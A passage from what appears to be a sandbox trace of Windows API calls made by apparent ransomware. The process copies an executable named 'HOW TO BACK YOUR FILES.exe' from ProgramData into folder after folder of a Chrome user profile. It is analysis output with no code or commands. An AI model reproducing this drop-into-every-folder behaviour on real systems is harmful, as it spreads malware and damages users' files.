dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.766] GetLastError () returned 0x0 [0104.766] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.766] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.766] CloseHandle (hObject=0x120) returned 1 [0104.766] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.766] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85096390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d20a3c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d20a3c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.766] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.766] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.767] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\JumpListIcons", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\JumpListIcons") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\JumpListIcons" [0104.767] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\JumpListIcons" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\JumpListIcons") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\JumpListIcons" [0104.767] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.767] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\jumplisticons\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.767] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.768] GetLastError () returned 0x0 [0104.768] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.768] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.768] CloseHandle (hObject=0x120) returned 1 [0104.768] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.768] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x96ec4eb0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d20a3c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d20a3c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.768] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.768] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.768] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions" [0104.769] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions" [0104.769] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.769] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.769] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.769] GetLastError () returned 0x0 [0104.770] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.770] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.770] CloseHandle (hObject=0x120) returned 1 [0104.770] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.770] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80d1a580, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4dee7ea0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dee7ea0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.770] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.770] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.770] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm" [0104.770] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm" [0104.770] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.770] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.771] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.771] GetLastError () returned 0x0 [0104.771] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.771] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.771] CloseHandle (hObject=0x120) returned 1 [0104.772] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.772] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8399f510, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4df0e000, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4df0e000, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.772] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.772] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.772] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0" [0104.772] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0" [0104.772] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.772] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.773] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.773] GetLastError () returned 0x0 [0104.773] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.773] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.773] CloseHandle (hObject=0x120) returned 1 [0104.773] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.773] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x833dcb50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d41f700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d41f700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.774] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.774] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.774] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata" [0104.774] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata" [0104.774] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.774] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.775] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.775] GetLastError () returned 0x0 [0104.775] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.775] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.775] CloseHandle (hObject=0x120) returned 1 [0104.775] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.775] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x836ddc00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d41f700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d41f700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.775] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.775] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.776] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales" [0104.776] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales" [0104.776] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.776] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.776] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.777] GetLastError () returned 0x0 [0104.777] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.777] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.777] CloseHandle (hObject=0x120) returned 1 [0104.777] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.777] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x833e6790, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4df34160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4df34160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.777] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.777] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.778] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW" [0104.778] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW" [0104.778] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.778] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_tw\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.778] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.779] GetLastError () returned 0x0 [0104.779] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.779] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.779] CloseHandle (hObject=0x120) returned 1 [0104.779] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.779] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, 